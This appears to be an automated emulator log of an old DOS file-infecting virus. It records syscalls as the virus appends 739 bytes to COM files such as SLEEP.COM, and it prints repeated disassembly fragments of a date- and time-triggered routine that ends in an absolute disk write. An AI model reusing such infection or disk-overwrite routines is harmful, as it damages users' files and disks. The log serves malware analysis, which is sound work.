2018-12-25T11:58:33.683024491Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.686448462Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.695311872Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.696527705Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.704224786Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.712156809Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.714689856Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.721963268Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.72812381Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.729424865Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.732938669Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.74069824Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.742089121Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.749900767Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.758866236Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.761572355Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:33.764572629Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:33.766702888Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:33.387626165Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:33.38916899Z 78 PC: 12afb | Find first file
2018-12-25T11:58:33.394683075Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:33.400624127Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:33.406436992Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:33.407875286Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.410246199Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:33.440235863Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:33.441779124Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.447492632Z 62 PC: 12aef | Close file
2018-12-25T11:58:33.454692951Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.45779754Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.463493609Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.469446947Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.471092277Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.473522177Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.480316239Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.481922427Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.487715429Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.494955229Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.497467113Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.50328757Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.508792487Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.510038785Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.512635883Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.519807193Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.521265582Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.528385269Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.534201606Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.536869147Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.544562128Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.548952946Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.550011423Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.553085448Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.562270604Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.564205454Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.572289886Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.581535078Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.584615019Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.59219951Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.600119494Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.601604887Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.604376207Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.613625194Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.615181731Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.622488505Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.632411023Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.635238577Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.64244046Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.650535072Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.652532751Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.655904889Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.667036634Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.668654295Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.676161134Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.686236502Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.689526739Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.696971332Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.704003422Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.705868042Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.708734892Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.717203946Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.719357956Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.726778973Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.735598656Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.738762461Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:33.741213123Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:33.743630264Z 44 PC: 12be2 | Get time 0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T11:58:33.747075467Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T11:58:33.753012273Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:33.432218947Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:33.433409753Z 78 PC: 12afb | Find first file
2018-12-25T11:58:33.440740277Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:33.447885081Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:33.454809656Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:33.456740774Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.459590373Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:33.47462201Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:33.476743964Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.483876093Z 62 PC: 12aef | Close file
2018-12-25T11:58:33.492920161Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.496743516Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.503993422Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.511828366Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.514333276Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.517573124Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.526360003Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.528428278Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.536024261Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.545042217Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.547690285Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.555260225Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.562729439Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.564632248Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.570374979Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.579655768Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.581227502Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.589730262Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.59959823Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.60636519Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.614940857Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.622154446Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.623775587Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.626965521Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.636433783Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.637956336Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.645144872Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.654398799Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.657565249Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.664764108Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.672428547Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.673988047Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.677119301Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.688115451Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.689735627Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.697051675Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.70782314Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.710711747Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.718168596Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.726755657Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.72825384Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.73099232Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.740959763Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.742771644Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.749998801Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.759094429Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.763018837Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.771503411Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.778817967Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.780938932Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.784067844Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.793121741Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.79540368Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.800008804Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.809272396Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.812299788Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:33.814607036Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:33.816887067Z 44 PC: 12be2 | Get time 0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T11:58:33.81938498Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T11:58:33.825568819Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:33.727375673Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:33.735268825Z 78 PC: 12afb | Find first file
2018-12-25T11:58:33.740872278Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:33.747614213Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:33.752074192Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:33.754495068Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.756608172Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:33.769260606Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:33.771167066Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.779769532Z 62 PC: 12aef | Close file
2018-12-25T11:58:33.78638316Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.800268929Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.807639066Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.814581065Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.81659072Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.819591805Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.828407102Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.830262792Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.838695234Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.847956642Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.851101837Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.859499266Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.866802214Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.868257689Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.872125927Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.880820255Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.882272024Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.890257879Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.899133491Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.901713286Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.909262824Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.916228669Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.917461578Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.920079756Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.925674981Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.926773314Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.931450552Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.940612512Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.943373519Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.950531022Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.957817283Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.959384726Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.962451908Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.971554709Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.973167576Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.980877714Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.990312931Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.992428589Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.998750548Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:34.006781108Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:34.008260559Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:34.012024405Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:34.023915449Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:34.025896503Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:34.033994695Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:34.04263746Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:34.045835859Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:34.053217942Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:34.061165836Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:34.063185046Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:34.066366619Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:34.07520658Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:34.077344225Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:34.084484333Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:34.093348504Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:34.097042713Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:34.099422691Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:34.101810002Z 44 PC: 12be2 | Get time 0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T11:58:34.10468489Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T11:58:34.111224577Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:34.348919957Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:34.35112256Z 78 PC: 12afb | Find first file
2018-12-25T11:58:34.357387478Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:34.3650738Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:34.373299387Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:34.374796007Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:34.377329438Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:35.238584652Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:35.240344761Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:35.245495861Z 62 PC: 12aef | Close file
2018-12-25T11:58:35.35664354Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:35.358668237Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:35.363095444Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:35.368377618Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:35.370853105Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:35.372691131Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:35.466876421Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:35.469855072Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:35.476814447Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:35.5428143Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:35.546387759Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:35.552899934Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:35.55930683Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:35.56121256Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:35.563993784Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:35.695831446Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:35.698129896Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:35.704584985Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:35.783077733Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:35.786427714Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:35.793033917Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:35.799350542Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:35.801439408Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:35.803997197Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:35.933695311Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:35.935228105Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:35.942083334Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:36.047330016Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:36.050286826Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:36.057566932Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:36.063826935Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:36.065431584Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:36.069199754Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:36.271483049Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:36.2731388Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:36.286035687Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:36.307116215Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:36.309632517Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:36.31646759Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:36.324034641Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:36.326447681Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:36.329578216Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:36.355497047Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:36.356840151Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:36.364469229Z 62 PC: 12aef | Close file (See above)
